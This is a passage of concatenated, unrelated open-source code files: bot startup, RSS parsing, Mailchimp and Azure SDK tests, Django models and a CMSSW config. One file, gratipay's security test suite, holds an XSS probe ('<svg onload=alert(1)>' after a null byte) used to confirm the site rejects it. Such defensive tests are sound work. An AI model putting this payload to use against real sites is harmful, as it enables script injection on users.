last_sync_token=third_sync.restore_id) # restores after purge don't fail fourth_sync = device.sync() response = fourth_sync.config.get_response() self.assertEqual(response.status_code, 200) def test_get_alt_device_id(): eq(get_alt_device_id('WebAppsLogin*<EMAIL>*as*example.mr.snuggles'), 'WebAppsLogin*<EMAIL>*as*example.mr.snuggles')
Scripts/Bots/runPython_bot/start.py
ShivangiPatel102/Python_and_the_Web
437
12635815
from bot import run_python_bot import logging from pytz import timezone from datetime import datetime TIMEZONE = "Asia/Kolkata" logging.Formatter.converter = lambda *args: datetime.now( tz=timezone(TIMEZONE) ).timetuple() logging.basicConfig( format="%(asctime)s - %(name)s - %(levelname)s - %(message)s", level=logging.INFO, datefmt="%d/%m/%Y %I:%M:%S %p", ) logger = logging.getLogger() logger.setLevel(20) run_python_bot.bot()
WebMirror/management/rss_parser_funcs/feed_parse_extractTandQ.py
fake-name/ReadableWebProxy
193
12635827
def extractTandQ(item): """ T&Q """ vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title']) if not (chp or vol or frag) or 'preview' in item['title'].lower(): return None bad = [ '#K-drama', 'fashion', 'C-Drama', '#Trending', 'Feature', '#Trailer', '#Eng Sub', 'Movies', 'Status Updates/Post Tallies', 'Learn Chinese', 'Short Stories', ] if any([(tmp in item['tags']) for tmp in bad]): return None tagmap = [ ('Three Kingdoms Online Overlord', 'Three Kingdoms Online Overlord', 'translated'), ('Three Kingdoms Online Overlord | 网游之三国超级领主', 'Three Kingdoms Online Overlord', 'translated'), ('Perfect Fiance', 'Perfect Fiancé', 'translated'), ('Perfect Fiancé | 完美未婚夫', 'Perfect Fiancé', 'translated'), ('Ten Years are not that Far', 'Ten Years are not that Far', 'translated'), ('#Les Interpretes', 'Les Interpretes', 'translated'), ('致我们终将逝去的青春', 'To Our Youth That is Fading Away', 'translated'), ('So Young | 致我们终将逝去的青春', 'To Our Youth That is Fading Away', 'translated'), ("Fleeting Midsummer (Beijing University's Weakest Student)", "Fleeting Midsummer (Beijing University's Weakest Student)", 'translated'), ("Fleeting Midsummer (Peking University's Weakest Student)", "Fleeting Midsummer (Peking University's Weakest Student)", 'translated'), ("Fleeting Midsummer (Peking University's Weakest Student)| 北大差生·", "Fleeting Midsummer (Peking University's Weakest Student)", 'translated'), ("Fleeting Midsummer (Peking University's Weakest Student)| 北大差生", "Fleeting Midsummer (Peking University's Weakest Student)", 'translated'), ('When A Snail Falls in Love| 如果蜗牛有爱情', 'When A Snail Falls in Love', 'translated'), ('The Rebirth of an Ill-Fated Consort | 重生之嫡女祸妃', 'The Rebirth of an Ill-Fated Consort', 'translated'), ('Siege in Fog | 迷雾围城', 'Siege in Fog', 'translated'), ('Pristine Darkness | 他来了请闭眼之暗粼', 'Pristine Darkness', 'translated'), ('Les Interpretes | 亲爱的翻译官', 'Les Interpretes', 'translated'), ('Les Interpretes | 情爱的翻译官', 'Les Interpretes', 'translated'), ('The Daily Record of Secretly Loving the Male Idol|男神暗恋日记', 'The Daily Record of Secretly Loving the Male Idol', 'translated'), ('Master Devil Don\'t Kiss Me', 'Master Devil Don\'t Kiss Me', 'translated'), ('Master Devil Don\'t Kiss Me! | 恶魔少爷别吻我', 'Master Devil Don\'t Kiss Me', 'translated'), ] for tagname, name, tl_type in tagmap: if tagname in item['tags']: return buildReleaseMessageWithType(item, name, vol, chp, frag=frag, postfix=postfix, tl_type=tl_type) return False
tests/py/test_security.py
kant/gratipay.com
517
12635845
from __future__ import absolute_import, division, print_function, unicode_literals import struct import datetime from aspen import Response from aspen.http.request import Request from base64 import urlsafe_b64decode from cryptography.fernet import Fernet, InvalidToken from gratipay import security from gratipay.models.participant import Identity from gratipay.security.crypto import EncryptingPacker from gratipay.testing import Harness from pytest import raises class RejectNullBytesInURI(Harness): def test_filters_path(self): assert self.client.GxT('/f%00/').code == 400 def test_filters_querystring(self): assert self.client.GxT('/', QUERY_STRING='f%00=bar').code == 400 def test_protects_against_reflected_xss(self): self.make_package() assert self.client.GET('/on/npm/foo').code == 200 assert self.client.GxT('/on/npm/foo%00<svg onload=alert(1)>').code == 400 assert self.client.GxT('/on/npm/foo%01<svg onload=alert(1)>').code == 404 # fyi class OnlyAllowCertainMethodsTests(Harness): def test_is_installed_properly(self): assert self.client.hxt('TRaCE', '/').code == 405 def test_allows_certain_methods(self): for allowed in ('GEt', 'HEaD', 'PosT'): request = Request(allowed) assert security.only_allow_certain_methods(request) is None def test_disallows_a_bunch_of_other_stuff(self): for disallowed in ('OPTIONS', 'TRACE', 'TRACK', 'PUT', 'DELETE'): request = Request(disallowed) response = raises(Response, security.only_allow_certain_methods, request).value assert response.code == 405 def test_doesnt_choke_error_handling(self): assert self.client.hit("OPTIONS", "/", raise_immediately=False).code == 405 def test_prevents_csrf_from_choking(self): assert self.client.PxST('/assets/gratipay.css').code == 405 class AddHeadersToResponseTests(Harness): def test_sets_x_frame_options(self): headers = self.client.GET('/about/').headers assert headers['X-Frame-Options'] == 'SAMEORIGIN' def test_sets_x_content_type_options(self): headers = self.client.GET('/about/').headers assert headers['X-Content-Type-Options'] == 'nosniff' def test_sets_x_xss_protection(self): headers = self.client.GET('/about/').headers assert headers['X-XSS-Protection'] == '1; mode=block' def test_sets_referrer_policy(self): headers = self.client.GET('/about/').headers assert headers['Referrer-Policy'] == \ 'no-referrer-when-downgrade, strict-origin-when-cross-origin' def test_sets_strict_transport_security(self): headers = self.client.GET('/about/').headers assert headers['strict-transport-security'] == 'max-age=31536000' def test_doesnt_set_content_security_policy_by_default(self): assert 'content-security-policy-report-only' not in self.client.GET('/about/').headers def test_sets_content_security_policy(self): with self.setenv(CSP_REPORT_URI='http://cheese/'): headers = self.client.GET('/about/').headers policy = ( "default-src 'self';" "script-src 'self' assets.gratipay.com 'unsafe-inline';" "style-src 'self' assets.gratipay.com downloads.gratipay.com cloud.typography.com" " 'sha256-WLocK7HeCKzQLS0M+PGS++5IhyfFsOA5N4ZCeTcltoo=';" "img-src *;" "font-src 'self' assets.gratipay.com cloud.typography.com data:;" "block-all-mixed-content;" "report-uri http://cheese/;" ) assert headers['content-security-policy-report-only'] == policy class EncryptingPackerTests(Harness): packed = b'gAAAAABXJMbdriJ984uMCMKfQ5p2UUNHB1vG43K_uJyzUffbu2Uwy0d71kAnqOKJ7Ww_FEQz9Dliw87UpM'\ b'5TdyoJsll5nMAicg==' def test_packs_encryptingly(self): packed = Identity.encrypting_packer.pack({"foo": "bar"}) assert urlsafe_b64decode(packed)[0] == b'\x80' # Fernet version def test_unpacks_decryptingly(self): assert Identity.encrypting_packer.unpack(self.packed) == {"foo": "bar"} def test_fails_to_unpack_old_data_with_a_new_key(self): encrypting_packer = EncryptingPacker(Fernet.generate_key()) raises(InvalidToken, encrypting_packer.unpack, self.packed) def test_can_unpack_if_old_key_is_provided(self): old_key = str(self.client.website.env.crypto_keys) encrypting_packer = EncryptingPacker(Fernet.generate_key(), old_key) assert encrypting_packer.unpack(self.packed) == {"foo": "bar"} def test_leaks_timestamp_derp(self): # https://github.com/pyca/cryptography/issues/2714 timestamp, = struct.unpack(">Q", urlsafe_b64decode(self.packed)[1:9]) # unencrypted! assert datetime.datetime.fromtimestamp(timestamp).year == 2016 def test_demands_bytes(self): raises(TypeError, Identity.encrypting_packer.unpack, buffer('buffer')) raises(TypeError, Identity.encrypting_packer.unpack, 'unicode')
mailchimp3/entities/listsignupforms.py
michaelwalkerfl/python-mailchimp
311
12635848
# coding=utf-8 """ The List Signup Forms API endpoint Documentation: http://developer.mailchimp.com/documentation/mailchimp/reference/lists/signup-forms/ Schema: https://api.mailchimp.com/schema/3.0/Lists/SignupForms/Instance.json """ from __future__ import unicode_literals from mailchimp3.baseapi import BaseApi class ListSignupForms(BaseApi): """ Manage list signup forms. """ def __init__(self, *args, **kwargs): """ Initialize the endpoint """ super(ListSignupForms, self).__init__(*args, **kwargs) self.endpoint = 'lists' self.list_id = None def create(self, list_id, data): """ Create a customized list signup form. No fields are listed as required in the documentation and the description of the method does not indicate any required fields either. :param list_id: The unique id for the list. :type list_id: :py:class:`str` :param data: The request body parameters :type data: :py:class:`dict` """ self.list_id = list_id response = self._mc_client._post(url=self._build_path(list_id, 'signup-forms'), data=data) return response def all(self, list_id): """ Get signup forms for a specific list. :param list_id: The unique id for the list. :type list_id: :py:class:`str` """ self.list_id = list_id return self._mc_client._get(url=self._build_path(list_id, 'signup-forms'))
apps/base/models.py
kaustubh-s1/EvalAI
1,470
12635852
from __future__ import unicode_literals import logging from django.db import models # Get an instance of a logger logger = logging.getLogger(__name__) class TimeStampedModel(models.Model): """ An abstract base class model that provides self-managed `created_at` and `modified_at` fields. """ created_at = models.DateTimeField(auto_now_add=True) modified_at = models.DateTimeField(auto_now=True) class Meta: abstract = True app_label = "base" def model_field_name(field_name, *args, **kwargs): """ The decorator is used to pass model field names to create_post_model_field function for logging change. """ def model_field_name_decorator(f, *args, **kwargs): def model_field_name_wrapper(sender, instance, **kwargs): f(sender, instance, field_name=field_name, **kwargs) return model_field_name_wrapper return model_field_name_decorator
venv/lib/python3.7/site-packages/allauth/socialaccount/providers/vimeo_oauth2/urls.py
vikram0207/django-rest
6,342
12635891
"""URLs for Patreon Provider""" from allauth.socialaccount.providers.oauth2.urls import default_urlpatterns from .provider import VimeoOAuth2Provider urlpatterns = default_urlpatterns(VimeoOAuth2Provider)
sdk/formrecognizer/azure-ai-formrecognizer/tests/test_to_dict_v2.py
vincenttran-msft/azure-sdk-for-python
2,728
12635913
# coding=utf-8 # -------------------------------------------------------------------------- # Copyright (c) Microsoft Corporation. All rights reserved. # Licensed under the MIT License. See License.txt in the project root for # license information. # -------------------------------------------------------------------------- from datetime import datetime from azure.ai.formrecognizer import _models from testcase import FormRecognizerTest class TestToDict(FormRecognizerTest): def test_point_to_dict(self): model = [_models.Point(1, 2), _models.Point(3, 4)] d = [p.to_dict() for p in model] final = [ {"x": 1, "y": 2}, { "x": 3, "y": 4, }, ] assert d == final def test_form_word_to_dict(self): form_word = _models.FormWord( text="word", confidence=0.92, page_number=1, bounding_box=[ _models.Point(1427.0, 1669.0), _models.Point(1527.0, 1669.0), _models.Point(1527.0, 1698.0), _models.Point(1427.0, 1698.0), ], ) d = form_word.to_dict() final = { "text": "word", "bounding_box": [ {"x": 1427.0, "y": 1669.0}, {"x": 1527.0, "y": 1669.0}, {"x": 1527.0, "y": 1698.0}, {"x": 1427.0, "y": 1698.0}, ], "confidence": 0.92, "page_number": 1, "kind": "word", } assert d == final def test_form_line_to_dict(self): form_line = _models.FormLine( text="sample line", bounding_box=[ _models.Point(1427.0, 1669.0), _models.Point(1527.0, 1669.0), _models.Point(1527.0, 1698.0), _models.Point(1427.0, 1698.0), ], words=[ _models.FormWord( text="sample", confidence=0.92, page_number=1, bounding_box=[ _models.Point(1427.0, 1669.0), _models.Point(1527.0, 1669.0), _models.Point(1527.0, 1698.0), _models.Point(1427.0, 1698.0), ], ), _models.FormWord( text="line", confidence=0.92, page_number=1, bounding_box=[ _models.Point(1427.0, 1669.0), _models.Point(1527.0, 1669.0), _models.Point(1527.0, 1698.0), _models.Point(1427.0, 1698.0), ], ), ], page_number=2, appearance=_models.TextAppearance( style_name="other", style_confidence=0.90 ), ) d = form_line.to_dict() final = { "text": "sample line", "bounding_box": [ {"x": 1427.0, "y": 1669.0}, {"x": 1527.0, "y": 1669.0}, {"x": 1527.0, "y": 1698.0}, {"x": 1427.0, "y": 1698.0}, ], "words": [ { "text": "sample", "bounding_box": [ {"x": 1427.0, "y": 1669.0}, {"x": 1527.0, "y": 1669.0}, {"x": 1527.0, "y": 1698.0}, {"x": 1427.0, "y": 1698.0}, ], "confidence": 0.92, "page_number": 1, "kind": "word", }, { "text": "line", "bounding_box": [ {"x": 1427.0, "y": 1669.0}, {"x": 1527.0, "y": 1669.0}, {"x": 1527.0, "y": 1698.0}, {"x": 1427.0, "y": 1698.0}, ], "confidence": 0.92, "page_number": 1, "kind": "word", }, ], "page_number": 2, "kind": "line", "appearance": {"style_name": "other", "style_confidence": 0.90}, } assert d == final def test_form_selection_mark_to_dict(self): form_selection_mark = _models.FormSelectionMark( text="checkbox", state="selected", confidence=0.92, page_number=1, bounding_box=[ _models.Point(1427.0, 1669.0), _models.Point(1527.0, 1669.0), _models.Point(1527.0, 1698.0), _models.Point(1427.0, 1698.0), ], ) d = form_selection_mark.to_dict() final = { "text": "checkbox", "state": "selected", "bounding_box": [ {"x": 1427.0, "y": 1669.0}, {"x": 1527.0, "y": 1669.0}, {"x": 1527.0, "y": 1698.0}, {"x": 1427.0, "y": 1698.0}, ], "confidence": 0.92, "page_number": 1, "kind": "selectionMark", } assert d == final def test_form_element_to_dict(self): form_element = _models.FormElement( kind="selectionMark", text="element", page_number=1, bounding_box=[ _models.Point(1427.0, 1669.0), _models.Point(1527.0, 1669.0), _models.Point(1527.0, 1698.0), _models.Point(1427.0, 1698.0), ], ) d = form_element.to_dict() final = { "text": "element", "bounding_box": [ {"x": 1427.0, "y": 1669.0}, {"x": 1527.0, "y": 1669.0}, {"x": 1527.0, "y": 1698.0}, {"x": 1427.0, "y": 1698.0}, ], "page_number": 1, "kind": "selectionMark", } assert d == final def test_text_appearance_to_dict(self): model = _models.TextAppearance( style_name="other", style_confidence=0.98 ) d = model.to_dict() final = {"style_name": "other", "style_confidence": 0.98} assert d == final def test_field_data_to_dict(self): model = _models.FieldData( text="element", page_number=1, bounding_box=[ _models.Point(1427.0, 1669.0), _models.Point(1527.0, 1669.0), _models.Point(1527.0, 1698.0), _models.Point(1427.0, 1698.0), ], field_elements=[ _models.FormWord( text="word", confidence=0.92, page_number=1, bounding_box=[ _models.Point(1427.0, 1669.0), _models.Point(1527.0, 1669.0), _models.Point(1527.0, 1698.0), _models.Point(1427.0, 1698.0), ], ), ], ) d = model.to_dict() final = { "text": "element", "bounding_box": [ {"x": 1427.0, "y": 1669.0}, {"x": 1527.0, "y": 1669.0}, {"x": 1527.0, "y": 1698.0}, {"x": 1427.0, "y": 1698.0}, ], "page_number": 1, "field_elements": [ { "text": "word", "bounding_box": [ {"x": 1427.0, "y": 1669.0}, {"x": 1527.0, "y": 1669.0}, {"x": 1527.0, "y": 1698.0}, {"x": 1427.0, "y": 1698.0}, ], "confidence": 0.92, "page_number": 1, "kind": "word", } ], } assert d == final def test_form_field_to_dict(self): form_field = _models.FormField( value_type="phoneNumber", label_data=_models.FieldData( text="phone", page_number=1, bounding_box=[ _models.Point(1427.0, 1669.0), _models.Point(1527.0, 1669.0), _models.Point(1527.0, 1698.0), _models.Point(1427.0, 1698.0), ], ), value_data=_models.FieldData( text="55554444", page_number=1, bounding_box=[ _models.Point(1427.0, 1669.0), _models.Point(1527.0, 1669.0), _models.Point(1527.0, 1698.0), _models.Point(1427.0, 1698.0), ], ), name="phone", value="55554444", confidence=0.99, ) d = form_field.to_dict() final = { "value_type": "phoneNumber", "label_data": { "text": "phone", "bounding_box": [ {"x": 1427.0, "y": 1669.0}, {"x": 1527.0, "y": 1669.0}, {"x": 1527.0, "y": 1698.0}, {"x": 1427.0, "y": 1698.0}, ], "page_number": 1, "field_elements": [] }, "value_data": { "text": "55554444", "bounding_box": [ {"x": 1427.0, "y": 1669.0}, {"x": 1527.0, "y": 1669.0}, {"x": 1527.0, "y": 1698.0}, {"x": 1427.0, "y": 1698.0}, ], "page_number": 1, "field_elements": [] }, "name": "phone", "value": "55554444", "confidence": 0.99, } assert d == final def test_recognized_form_to_dict(self): form = _models.RecognizedForm( form_type="test_form", form_type_confidence="0.84", model_id="examplemodel123", page_range=_models.FormPageRange(1, 1), fields={ "example": _models.FormField( value_type="phoneNumber", label_data=_models.FieldData( text="phone", page_number=1, bounding_box=[ _models.Point(1427.0, 1669.0), _models.Point(1527.0, 1669.0), _models.Point(1527.0, 1698.0), _models.Point(1427.0, 1698.0), ], ), value_data=_models.FieldData( text="55554444", page_number=1, bounding_box=[ _models.Point(1427.0, 1669.0), _models.Point(1527.0, 1669.0), _models.Point(1527.0, 1698.0), _models.Point(1427.0, 1698.0), ], ), name="phone", value="55554444", confidence=0.99, ) }, pages=[_models.FormPage( page_number=1, text_angle=180.0, width=5.5, height=8.0, unit="pixel", lines=[_models.FormLine( text="sample line", bounding_box=[ _models.Point(1427.0, 1669.0), _models.Point(1527.0, 1669.0), _models.Point(1527.0, 1698.0), _models.Point(1427.0, 1698.0), ], words=[ _models.FormWord( text="sample", confidence=0.92, page_number=1, bounding_box=[ _models.Point(1427.0, 1669.0), _models.Point(1527.0, 1669.0), _models.Point(1527.0, 1698.0), _models.Point(1427.0, 1698.0), ], ), _models.FormWord( text="line", confidence=0.92, page_number=1, bounding_box=[ _models.Point(1427.0, 1669.0), _models.Point(1527.0, 1669.0), _models.Point(1527.0, 1698.0), _models.Point(1427.0, 1698.0), ], ), ], page_number=2, appearance=_models.TextAppearance( style_name="other", style_confidence=0.90 ), )], ) ] ) d = form.to_dict() final = { "form_type": "test_form", "form_type_confidence": "0.84", "model_id": "examplemodel123", "page_range": {"first_page_number": 1, "last_page_number": 1}, "fields": { "example": { "value_type": "phoneNumber", "label_data": { "text": "phone", "bounding_box": [ {"x": 1427.0, "y": 1669.0}, {"x": 1527.0, "y": 1669.0}, {"x": 1527.0, "y": 1698.0}, {"x": 1427.0, "y": 1698.0}, ], "page_number": 1, "field_elements": [] }, "value_data": { "text": "55554444", "bounding_box": [ {"x": 1427.0, "y": 1669.0}, {"x": 1527.0, "y": 1669.0}, {"x": 1527.0, "y": 1698.0}, {"x": 1427.0, "y": 1698.0}, ], "page_number": 1, "field_elements": [] }, "name": "phone", "value": "55554444", "confidence": 0.99, } }, "pages": [{ "page_number": 1, "text_angle": 180.0, "width": 5.5, "height": 8.0, "unit": "pixel", "lines": [{ "text": "sample line", "bounding_box": [ {"x": 1427.0, "y": 1669.0}, {"x": 1527.0, "y": 1669.0}, {"x": 1527.0, "y": 1698.0}, {"x": 1427.0, "y": 1698.0}, ], "words": [ { "text": "sample", "bounding_box": [ {"x": 1427.0, "y": 1669.0}, {"x": 1527.0, "y": 1669.0}, {"x": 1527.0, "y": 1698.0}, {"x": 1427.0, "y": 1698.0}, ], "confidence": 0.92, "page_number": 1, "kind": "word", }, { "text": "line", "bounding_box": [ {"x": 1427.0, "y": 1669.0}, {"x": 1527.0, "y": 1669.0}, {"x": 1527.0, "y": 1698.0}, {"x": 1427.0, "y": 1698.0}, ], "confidence": 0.92, "page_number": 1, "kind": "word", }, ], "page_number": 2, "kind": "line", "appearance": {"style_name": "other", "style_confidence": 0.90}, }], "selection_marks": [], "tables": [], }], } assert d == final def test_form_page_to_dict(self): form_page = _models.FormPage( page_number=1, text_angle=180.0, width=5.5, height=8.0, unit="pixel", tables= [ _models.FormTable( page_number=2, cells=[ _models.FormTableCell( text="info", row_index=1, column_index=3, row_span=1, column_span=2, bounding_box=[ _models.Point(1427.0, 1669.0), _models.Point(1527.0, 1669.0), _models.Point(1527.0, 1698.0), _models.Point(1427.0, 1698.0), ], confidence=0.87, is_header=False, is_footer=True, page_number=1, field_elements=[ _models.FormWord( text="word", confidence=0.92, page_number=1, bounding_box=[ _models.Point(1427.0, 1669.0), _models.Point(1527.0, 1669.0), _models.Point(1527.0, 1698.0), _models.Point(1427.0, 1698.0), ], ), ] ) ], row_count=10, column_count=5, bounding_box=[ _models.Point(1427.0, 1669.0), _models.Point(1527.0, 1669.0), _models.Point(1527.0, 1698.0), _models.Point(1427.0, 1698.0), ], ), ], lines=[_models.FormLine( text="sample line", bounding_box=[ _models.Point(1427.0, 1669.0), _models.Point(1527.0, 1669.0), _models.Point(1527.0, 1698.0), _models.Point(1427.0, 1698.0), ], words=[ _models.FormWord( text="sample", confidence=0.92, page_number=1, bounding_box=[ _models.Point(1427.0, 1669.0), _models.Point(1527.0, 1669.0), _models.Point(1527.0, 1698.0), _models.Point(1427.0, 1698.0), ], ), _models.FormWord( text="line", confidence=0.92, page_number=1, bounding_box=[ _models.Point(1427.0, 1669.0), _models.Point(1527.0, 1669.0), _models.Point(1527.0, 1698.0), _models.Point(1427.0, 1698.0), ], ), ], page_number=2, appearance=_models.TextAppearance( style_name="other", style_confidence=0.90 ), ), ], selection_marks=[_models.FormSelectionMark( text="checkbox", state="selected", confidence=0.92, page_number=1, bounding_box=[ _models.Point(1427.0, 1669.0), _models.Point(1527.0, 1669.0), _models.Point(1527.0, 1698.0), _models.Point(1427.0, 1698.0), ], ), ], ) d = form_page.to_dict() final = { "page_number": 1, "text_angle": 180.0, "width": 5.5, "height": 8.0, "unit": "pixel", "tables": [ {"cells": [ { "text": "info", "bounding_box": [ {"x": 1427.0, "y": 1669.0}, {"x": 1527.0, "y": 1669.0}, {"x": 1527.0, "y": 1698.0}, {"x": 1427.0, "y": 1698.0}, ], "row_index": 1, "column_index": 3, "row_span": 1, "column_span": 2, "confidence": 0.87, "is_header": False, "is_footer": True, "page_number": 1, "field_elements": [ { "text": "word", "bounding_box": [ {"x": 1427.0, "y": 1669.0}, {"x": 1527.0, "y": 1669.0}, {"x": 1527.0, "y": 1698.0}, {"x": 1427.0, "y": 1698.0}, ], "confidence": 0.92, "page_number": 1, "kind": "word", } ], }, ], "page_number": 2, "row_count": 10, "column_count": 5, "bounding_box": [ {"x": 1427.0, "y": 1669.0}, {"x": 1527.0, "y": 1669.0}, {"x": 1527.0, "y": 1698.0}, {"x": 1427.0, "y": 1698.0}, ], }, ], "lines": [{ "text": "sample line", "bounding_box": [ {"x": 1427.0, "y": 1669.0}, {"x": 1527.0, "y": 1669.0}, {"x": 1527.0, "y": 1698.0}, {"x": 1427.0, "y": 1698.0}, ], "words": [ { "text": "sample", "bounding_box": [ {"x": 1427.0, "y": 1669.0}, {"x": 1527.0, "y": 1669.0}, {"x": 1527.0, "y": 1698.0}, {"x": 1427.0, "y": 1698.0}, ], "confidence": 0.92, "page_number": 1, "kind": "word", }, { "text": "line", "bounding_box": [ {"x": 1427.0, "y": 1669.0}, {"x": 1527.0, "y": 1669.0}, {"x": 1527.0, "y": 1698.0}, {"x": 1427.0, "y": 1698.0}, ], "confidence": 0.92, "page_number": 1, "kind": "word", }, ], "page_number": 2, "kind": "line", "appearance": {"style_name": "other", "style_confidence": 0.90}, }], "selection_marks": [{ "text": "checkbox", "state": "selected", "bounding_box": [ {"x": 1427.0, "y": 1669.0}, {"x": 1527.0, "y": 1669.0}, {"x": 1527.0, "y": 1698.0}, {"x": 1427.0, "y": 1698.0}, ], "confidence": 0.92, "page_number": 1, "kind": "selectionMark", }], } assert d == final def test_form_table_cell_to_dict(self): table_cell = _models.FormTableCell( text="info", row_index=1, column_index=3, row_span=1, column_span=2, bounding_box=[ _models.Point(1427.0, 1669.0), _models.Point(1527.0, 1669.0), _models.Point(1527.0, 1698.0), _models.Point(1427.0, 1698.0), ], confidence=0.87, is_header=False, is_footer=True, page_number=1, field_elements=[ _models.FormWord( text="word", confidence=0.92, page_number=1, bounding_box=[ _models.Point(1427.0, 1669.0), _models.Point(1527.0, 1669.0), _models.Point(1527.0, 1698.0), _models.Point(1427.0, 1698.0), ], ), ] ) d = table_cell.to_dict() final = { "text": "info", "bounding_box": [ {"x": 1427.0, "y": 1669.0}, {"x": 1527.0, "y": 1669.0}, {"x": 1527.0, "y": 1698.0}, {"x": 1427.0, "y": 1698.0}, ], "row_index": 1, "column_index": 3, "row_span": 1, "column_span": 2, "confidence": 0.87, "is_header": False, "is_footer": True, "page_number": 1, "field_elements": [ { "text": "word", "bounding_box": [ {"x": 1427.0, "y": 1669.0}, {"x": 1527.0, "y": 1669.0}, {"x": 1527.0, "y": 1698.0}, {"x": 1427.0, "y": 1698.0}, ], "confidence": 0.92, "page_number": 1, "kind": "word", } ], } assert d == final def test_form_table_to_dict(self): table = _models.FormTable( page_number=2, cells=[ _models.FormTableCell( text="info", row_index=1, column_index=3, row_span=1, column_span=2, bounding_box=[ _models.Point(1427.0, 1669.0), _models.Point(1527.0, 1669.0), _models.Point(1527.0, 1698.0), _models.Point(1427.0, 1698.0), ], confidence=0.87, is_header=False, is_footer=True, page_number=1, field_elements=[ _models.FormWord( text="word", confidence=0.92, page_number=1, bounding_box=[ _models.Point(1427.0, 1669.0), _models.Point(1527.0, 1669.0), _models.Point(1527.0, 1698.0), _models.Point(1427.0, 1698.0), ], ), ] ) ], row_count=10, column_count=5, bounding_box=[ _models.Point(1427.0, 1669.0), _models.Point(1527.0, 1669.0), _models.Point(1527.0, 1698.0), _models.Point(1427.0, 1698.0), ], ) d = table.to_dict() final = { "cells": [ { "text": "info", "bounding_box": [ {"x": 1427.0, "y": 1669.0}, {"x": 1527.0, "y": 1669.0}, {"x": 1527.0, "y": 1698.0}, {"x": 1427.0, "y": 1698.0}, ], "row_index": 1, "column_index": 3, "row_span": 1, "column_span": 2, "confidence": 0.87, "is_header": False, "is_footer": True, "page_number": 1, "field_elements": [ { "text": "word", "bounding_box": [ {"x": 1427.0, "y": 1669.0}, {"x": 1527.0, "y": 1669.0}, {"x": 1527.0, "y": 1698.0}, {"x": 1427.0, "y": 1698.0}, ], "confidence": 0.92, "page_number": 1, "kind": "word", } ], }, ], "page_number": 2, "row_count": 10, "column_count": 5, "bounding_box": [ {"x": 1427.0, "y": 1669.0}, {"x": 1527.0, "y": 1669.0}, {"x": 1527.0, "y": 1698.0}, {"x": 1427.0, "y": 1698.0}, ], } assert d == final def test_custom_form_model_properties_to_dict(self): model = _models.CustomFormModelProperties( is_composed_model=True, ) d = model.to_dict() final = { "is_composed_model": True, } assert d == final def test_account_properties_to_dict(self): model = _models.AccountProperties( custom_model_count=5, custom_model_limit=10, ) d = model.to_dict() final = { "custom_model_count": 5, "custom_model_limit": 10, } assert d == final def test_custom_form_model_info_to_dict(self): model = _models.CustomFormModelInfo( model_id="1234", status="creating", training_started_on=datetime(2021, 1, 10, 23, 55, 59, 342380), training_completed_on=datetime(2021, 1, 10, 23, 55, 59, 342380), model_name="sample_model", properties=_models.CustomFormModelProperties( is_composed_model=False, ) ) d = model.to_dict() final = { "model_id": "1234", "status": "creating", "training_started_on": datetime(2021, 1, 10, 23, 55, 59, 342380), "training_completed_on": datetime(2021, 1, 10, 23, 55, 59, 342380), "model_name": "sample_model", "properties": { "is_composed_model": False, } } assert d == final def test_form_recognizer_error_to_dict(self): model = _models.FormRecognizerError( code=404, message="error not found", ) d = model.to_dict() final = { "code": 404, "message": "error not found", } assert d == final def test_training_document_info_to_dict(self): model = _models.TrainingDocumentInfo( name="sample doc", status="succeeded", page_count=3, errors=[ _models.FormRecognizerError( code=404, message="error not found", ) ], model_id="1234", ) d = model.to_dict() final = { "name": "sample doc", "status": "succeeded", "page_count": 3, "errors": [ { "code": 404, "message": "error not found", } ], "model_id": "1234", } assert d == final def test_custom_form_model_field_to_dict(self): model = _models.CustomFormModelField( label="field_label", name="field", accuracy=0.98, ) d = model.to_dict() final = { "label": "field_label", "name": "field", "accuracy": 0.98, } assert d == final def test_custom_form_submodel_to_dict(self): model = _models.CustomFormSubmodel( model_id="1234", form_type="submodel", accuracy=0.98, fields={ "example": _models.CustomFormModelField( label="field_label", name="field", accuracy=0.98, ) } ) d = model.to_dict() final = { "model_id": "1234", "form_type": "submodel", "accuracy": 0.98, "fields": { "example": { "label": "field_label", "name": "field", "accuracy": 0.98, } } } assert d == final def test_custom_form_model_to_dict(self): model = _models.CustomFormModel( model_id="1234", status="ready", training_started_on=datetime(2021, 1, 10, 23, 55, 59, 342380), training_completed_on=datetime(2021, 1, 10, 23, 55, 59, 342380), submodels=[ _models.CustomFormSubmodel( model_id="1234", form_type="submodel", accuracy=0.98, fields={ "example": _models.CustomFormModelField( label="field_label", name="field", accuracy=0.98, ) } ) ], errors=[ _models.FormRecognizerError( code=404, message="error not found", ) ], training_documents=[ _models.TrainingDocumentInfo( name="sample doc", status="succeeded", page_count=3, errors=[ _models.FormRecognizerError( code=404, message="error not found", ) ], model_id="1234", ) ], model_name="sample model", properties=_models.CustomFormModelProperties( is_composed_model=True, ) ) d = model.to_dict() final = { "model_id": "1234", "status": "ready", "training_started_on": datetime(2021, 1, 10, 23, 55, 59, 342380), "training_completed_on": datetime(2021, 1, 10, 23, 55, 59, 342380), "submodels": [{ "model_id": "1234", "form_type": "submodel", "accuracy": 0.98, "fields": { "example": { "label": "field_label", "name": "field", "accuracy": 0.98, } } }], "errors": [ { "code": 404, "message": "error not found", } ], "training_documents": [ { "name": "sample doc", "status": "succeeded", "page_count": 3, "errors": [ { "code": 404, "message": "error not found", } ], "model_id": "1234", } ], "model_name": "sample model", "properties": { "is_composed_model": True, } } assert d == final
Validation/HGCalValidation/python/HFNoseDigiClient_cfi.py
ckamtsikis/cmssw
852
12635943
<reponame>ckamtsikis/cmssw<filename>Validation/HGCalValidation/python/HFNoseDigiClient_cfi.py import FWCore.ParameterSet.Config as cms from Validation.HGCalValidation.HGCalDigiClient_cfi import * hfnoseDigiClient = hgcalDigiClientEE.clone( DetectorName = cms.string("HGCalHFNoseSensitive"))
blender/MapsModelsImporter/operators.py
r23/MapsModelsImporter
1,401
12635948
# Copyright (c) 2019 <NAME> # # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the “Software”), to deal # in the Software without restriction, including without limitation the rights # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in # all copies or substantial portions of the Software. # # The Software is provided “as is”, without warranty of any kind, express or # implied, including but not limited to the warranties of merchantability, # fitness for a particular purpose and noninfringement. In no event shall # the authors or copyright holders be liable for any claim, damages or other # liability, whether in an action of contract, tort or otherwise, arising from, # out of or in connection with the software or the use or other dealings in the # Software. # # This file is part of MapsModelsImporter, a set of addons to import 3D models # from Maps services import bpy from 